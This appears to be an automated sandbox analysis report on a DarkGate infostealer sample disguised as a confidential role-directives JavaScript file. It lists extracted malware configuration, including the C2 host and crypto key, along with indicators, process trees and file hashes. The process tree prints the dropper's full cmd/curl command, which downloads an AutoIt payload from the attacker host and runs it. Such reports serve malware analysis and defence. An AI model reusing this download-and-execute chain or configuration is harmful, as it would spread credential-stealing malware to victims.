darkgate | d2dcaec93d82105a85aa59a8c4bc3fb68cd84eefd9bac9caec917a6554ef63fe

Analysis

max time kernel
165s
max time network
173s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
19-10-2023 19:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Role_Directives_Effective_2023_Confidential.js
Size

51KB
MD5

98a065c330d0e987786793a243f7f53e
SHA1

277fc8a50892980c5523d1e1706d706d64e76624
SHA256

54464835989986ae3804a570f5e3b299db8cb2a19a47d6444b1d410ad51586ee
SHA512

ea07611e517669fc9dc3987d57598ccc33487035b1d22a346e40a6c06fcb8f38d1dd1f821bff8a478730ba73913ab518ad41301d13b61aee36fbe680e9943c23
SSDEEP

768:pBA7PMMFA0tdlXKNSR4vlGRep2lcwJeL+C2jQdc7YCORUQuFBt3PywbIp9:nAIMFFdYMxAcEQDtk9

Score

10^/10

darkgate ricoc3 stealer

Malware Config

Extracted

Family

darkgate

Botnet

Ricoc3

http://hgfdytrywq.com

Attributes

alternative_c2_port
8080
anti_analysis
false
anti_debug
false
anti_vm
false
c2_port
80
check_disk
false
check_ram
false
check_xeon
false
crypter_au3
false
crypter_dll
false
crypter_rawstub
true
crypto_key
nZKkcsjzXrNNYH
internal_mutex
txtMut
minimum_disk
100
minimum_ram
4096
ping_interval
4
rootkit
true
startup_persistence
true
username
Ricoc3

Signatures

DarkGate
DarkGate is an infostealer written in C++.
stealer darkgate

Suspicious use of NtCreateUserProcessOtherParentProcess 64 IoCs

description	pid	Process	procid_target
PID 4460 created 3196	4460	Autoit3.exe	14
PID 4460 created 3196	4460	Autoit3.exe	14
PID 4460 created 2744	4460	Autoit3.exe	82
PID 4460 created 2984	4460	Autoit3.exe	81
PID 4460 created 2724	4460	Autoit3.exe	80
PID 4460 created 2724	4460	Autoit3.exe	80
PID 4460 created 3720	4460	Autoit3.exe	35
PID 4460 created 3016	4460	Autoit3.exe	41
PID 4460 created 3848	4460	Autoit3.exe	34
PID 4460 created 3196	4460	Autoit3.exe	14
PID 4460 created 3196	4460	Autoit3.exe	14
PID 4460 created 2796	4460	Autoit3.exe	44
PID 2504 created 2840	2504	cmd.exe	43
PID 2504 created 3720	2504	cmd.exe	35
PID 2504 created 3848	2504	cmd.exe	34
PID 2504 created 4440	2504	cmd.exe	22
PID 2504 created 2796	2504	cmd.exe	44
PID 2504 created 2796	2504	cmd.exe	44
PID 2504 created 2840	2504	cmd.exe	43
PID 2504 created 3548	2504	cmd.exe	37
PID 2504 created 3016	2504	cmd.exe	41
PID 2504 created 3548	2504	cmd.exe	37
PID 2504 created 3848	2504	cmd.exe	34
PID 2504 created 3848	2504	cmd.exe	34
PID 2504 created 4440	2504	cmd.exe	22
PID 2504 created 2796	2504	cmd.exe	44
PID 2504 created 3644	2504	cmd.exe	36
PID 2504 created 3548	2504	cmd.exe	37
PID 2504 created 3720	2504	cmd.exe	35
PID 2504 created 2840	2504	cmd.exe	43
PID 2504 created 2796	2504	cmd.exe	44
PID 2504 created 3016	2504	cmd.exe	41
PID 2504 created 3720	2504	cmd.exe	35
PID 2504 created 3644	2504	cmd.exe	36
PID 2504 created 3548	2504	cmd.exe	37
PID 2504 created 4440	2504	cmd.exe	22
PID 2504 created 3644	2504	cmd.exe	36
PID 2504 created 3548	2504	cmd.exe	37
PID 2504 created 2840	2504	cmd.exe	43
PID 2504 created 2796	2504	cmd.exe	44
PID 2504 created 3548	2504	cmd.exe	37
PID 2504 created 2796	2504	cmd.exe	44
PID 2504 created 2796	2504	cmd.exe	44
PID 2504 created 3644	2504	cmd.exe	36
PID 2504 created 2840	2504	cmd.exe	43
PID 2504 created 3644	2504	cmd.exe	36
PID 2504 created 3548	2504	cmd.exe	37
PID 2504 created 2840	2504	cmd.exe	43
PID 2504 created 4440	2504	cmd.exe	22
PID 2504 created 3548	2504	cmd.exe	37
PID 2504 created 3548	2504	cmd.exe	37
PID 2504 created 3644	2504	cmd.exe	36
PID 2504 created 4440	2504	cmd.exe	22
PID 2504 created 4440	2504	cmd.exe	22
PID 2504 created 3644	2504	cmd.exe	36
PID 2504 created 3644	2504	cmd.exe	36
PID 2504 created 2796	2504	cmd.exe	44
PID 2504 created 2796	2504	cmd.exe	44
PID 2504 created 2796	2504	cmd.exe	44
PID 2504 created 3848	2504	cmd.exe	34
PID 2504 created 2840	2504	cmd.exe	43
PID 2504 created 2840	2504	cmd.exe	43
PID 2504 created 3016	2504	cmd.exe	41
PID 2504 created 3644	2504	cmd.exe	36

Blocklisted process makes network request 64 IoCs

flow	pid	Process
24	2504	cmd.exe
25	2504	cmd.exe
26	2504	cmd.exe
27	2504	cmd.exe
42	2504	cmd.exe
46	2504	cmd.exe
47	2504	cmd.exe
49	2504	cmd.exe
50	2504	cmd.exe
51	2504	cmd.exe
52	2504	cmd.exe
53	2504	cmd.exe
54	2504	cmd.exe
55	2504	cmd.exe
56	2504	cmd.exe
57	2504	cmd.exe
58	2504	cmd.exe
59	2504	cmd.exe
60	2504	cmd.exe
61	2504	cmd.exe
62	2504	cmd.exe
63	2504	cmd.exe
64	2504	cmd.exe
65	2504	cmd.exe
66	2504	cmd.exe
67	2504	cmd.exe
68	2504	cmd.exe
69	2504	cmd.exe
70	2504	cmd.exe
71	2504	cmd.exe
72	2504	cmd.exe
76	2504	cmd.exe
78	2504	cmd.exe
79	2504	cmd.exe
80	2504	cmd.exe
81	2504	cmd.exe
82	2504	cmd.exe
83	2504	cmd.exe
84	2504	cmd.exe
86	2504	cmd.exe
87	2504	cmd.exe
88	2504	cmd.exe
89	2504	cmd.exe
90	2504	cmd.exe
91	2504	cmd.exe
92	2504	cmd.exe
93	2504	cmd.exe
94	2504	cmd.exe
95	2504	cmd.exe
96	2504	cmd.exe
97	2504	cmd.exe
98	2504	cmd.exe
99	2504	cmd.exe
100	2504	cmd.exe
101	2504	cmd.exe
102	2504	cmd.exe
103	2504	cmd.exe
104	2504	cmd.exe
105	2504	cmd.exe
106	2504	cmd.exe
107	2504	cmd.exe
108	2504	cmd.exe
109	2504	cmd.exe
114	2504	cmd.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation	wscript.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\efahbcb.lnk	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
4460	Autoit3.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4460 set thread context of 2504	4460	Autoit3.exe	93

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Autoit3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Autoit3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	cmd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	cmd.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4460	Autoit3.exe
4460	Autoit3.exe
4460	Autoit3.exe
4460	Autoit3.exe
4460	Autoit3.exe
4460	Autoit3.exe
4460	Autoit3.exe
4460	Autoit3.exe
4460	Autoit3.exe
4460	Autoit3.exe
4460	Autoit3.exe
4460	Autoit3.exe
4460	Autoit3.exe
4460	Autoit3.exe
4460	Autoit3.exe
4460	Autoit3.exe
4460	Autoit3.exe
4460	Autoit3.exe
4460	Autoit3.exe
4460	Autoit3.exe
4460	Autoit3.exe
4460	Autoit3.exe
4460	Autoit3.exe
4460	Autoit3.exe
4460	Autoit3.exe
4460	Autoit3.exe
2504	cmd.exe
2504	cmd.exe
2504	cmd.exe
2504	cmd.exe
2504	cmd.exe
2504	cmd.exe
2504	cmd.exe
2504	cmd.exe
2504	cmd.exe
2504	cmd.exe
2504	cmd.exe
2504	cmd.exe
2504	cmd.exe
2504	cmd.exe
2504	cmd.exe
2504	cmd.exe
2504	cmd.exe
2504	cmd.exe
2504	cmd.exe
2504	cmd.exe
2504	cmd.exe
2504	cmd.exe
2504	cmd.exe
2504	cmd.exe
2504	cmd.exe
2504	cmd.exe
2504	cmd.exe
2504	cmd.exe
2504	cmd.exe
2504	cmd.exe
2504	cmd.exe
2504	cmd.exe
2504	cmd.exe
2504	cmd.exe
2504	cmd.exe
2504	cmd.exe
2504	cmd.exe
2504	cmd.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2504	cmd.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 2724 wrote to memory of 2984	2724	wscript.exe	81
PID 2724 wrote to memory of 2984	2724	wscript.exe	81
PID 2984 wrote to memory of 2140	2984	cmd.exe	84
PID 2984 wrote to memory of 2140	2984	cmd.exe	84
PID 2984 wrote to memory of 3092	2984	cmd.exe	85
PID 2984 wrote to memory of 3092	2984	cmd.exe	85
PID 2984 wrote to memory of 4460	2984	cmd.exe	86
PID 2984 wrote to memory of 4460	2984	cmd.exe	86
PID 2984 wrote to memory of 4460	2984	cmd.exe	86
PID 4460 wrote to memory of 2504	4460	Autoit3.exe	93
PID 4460 wrote to memory of 2504	4460	Autoit3.exe	93
PID 4460 wrote to memory of 2504	4460	Autoit3.exe	93
PID 4460 wrote to memory of 2504	4460	Autoit3.exe	93
PID 4460 wrote to memory of 2504	4460	Autoit3.exe	93

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:3196

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
1⤵
PID:4440

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:3848

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3720

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:3644

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3548

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
PID:3016

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2840

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2796

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Role_Directives_Effective_2023_Confidential.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2724
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\Admin\AppData\Local\Temp & curl -o Autoit3.exe http://hgfdytrywq.com:80 & curl -o rfihfr.au3 http://hgfdytrywq.com:80/msihthowuna & Autoit3.exe rfihfr.au3
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2984
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2744
- - C:\Windows\system32\curl.exe
    curl -o Autoit3.exe http://hgfdytrywq.com:80
    3⤵
    PID:2140
- - C:\Windows\system32\curl.exe
    curl -o rfihfr.au3 http://hgfdytrywq.com:80/msihthowuna
    3⤵
    PID:3092
- - C:\Users\Admin\AppData\Local\Temp\Autoit3.exe
    Autoit3.exe rfihfr.au3
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4460
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ping 127.0.0.1
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Blocklisted process makes network request
      Drops startup file
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: GetForegroundWindowSpam
      PID:2504

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\dfcegec\Autoit3.exe

Filesize
872KB

MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\ProgramData\dfcegec\defhkca\ebakceb

Filesize
166B

MD5
56883b41580a23f3a667fef18f007703

SHA1
d1f40f16b31528031f61456e96c1fc09d4db2902

SHA256
afef80190e6b896294edf01442b7e61f6c81ed744ade378aee64fe33c0a14928

SHA512
2715c7df8c3aac0e767734d2234f73f796dde3da913145a94497a7483ac9ead1c7ee207519a46ccce2f7544bcadd46f29f80757f001122c5f168421a8d20912f

Download Submit
C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe

Filesize
872KB

MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Autoit3.exe

Filesize
872KB

MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\rfihfr.au3

Filesize
488KB

MD5
35f52e907f6e1b5e69b1c2b09bb2c7ab

SHA1
e0515eb058df6d3163ebea48ebc115bfb73d3d82

SHA256
ed1f049cf36bd47bf980ffbd7a78ff7411978bc79b149d61f707789773dd4615

SHA512
35bbd35bfeda265dd22206dac68c3563f4444e80855450d7d264011de07e827bc5f1232630554cc1b64f6edfd23ae80c6d4b926d385056e05b38b49e23ec5135

Download Submit
\??\c:\temp\eabfbfb.au3

Filesize
488KB

MD5
35f52e907f6e1b5e69b1c2b09bb2c7ab

SHA1
e0515eb058df6d3163ebea48ebc115bfb73d3d82

SHA256
ed1f049cf36bd47bf980ffbd7a78ff7411978bc79b149d61f707789773dd4615

SHA512
35bbd35bfeda265dd22206dac68c3563f4444e80855450d7d264011de07e827bc5f1232630554cc1b64f6edfd23ae80c6d4b926d385056e05b38b49e23ec5135

Download Submit
memory/2504-54-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-51-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-92-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-90-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-91-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-58-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-89-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-88-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-24-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-23-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-29-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-30-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-31-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-60-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-38-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-37-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-39-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-43-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-42-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-44-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-46-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-47-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-48-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-49-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-50-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-59-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-52-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-53-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-19-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-55-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-56-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-57-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-87-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-21-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-86-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-61-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-63-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-64-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-65-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-66-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-67-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-68-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-69-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-70-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-71-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-72-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-73-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-74-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-75-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-76-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-77-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-81-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-80-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-82-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-83-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-84-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2504-85-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/4460-8-0x00000000010D0000-0x00000000014D0000-memory.dmp

Filesize
4.0MB

Download
memory/4460-17-0x0000000004380000-0x00000000046B2000-memory.dmp

Filesize
3.2MB

Download
memory/4460-20-0x00000000010D0000-0x00000000014D0000-memory.dmp

Filesize
4.0MB

Download
memory/4460-18-0x0000000004380000-0x00000000046B2000-memory.dmp

Filesize
3.2MB

Download
memory/4460-16-0x0000000004380000-0x00000000046B2000-memory.dmp

Filesize
3.2MB

Download
memory/4460-15-0x0000000004380000-0x00000000046B2000-memory.dmp

Filesize
3.2MB

Download
memory/4460-9-0x0000000004380000-0x00000000046B2000-memory.dmp

Filesize
3.2MB

Download
memory/4460-22-0x0000000004380000-0x00000000046B2000-memory.dmp

Filesize
3.2MB

Download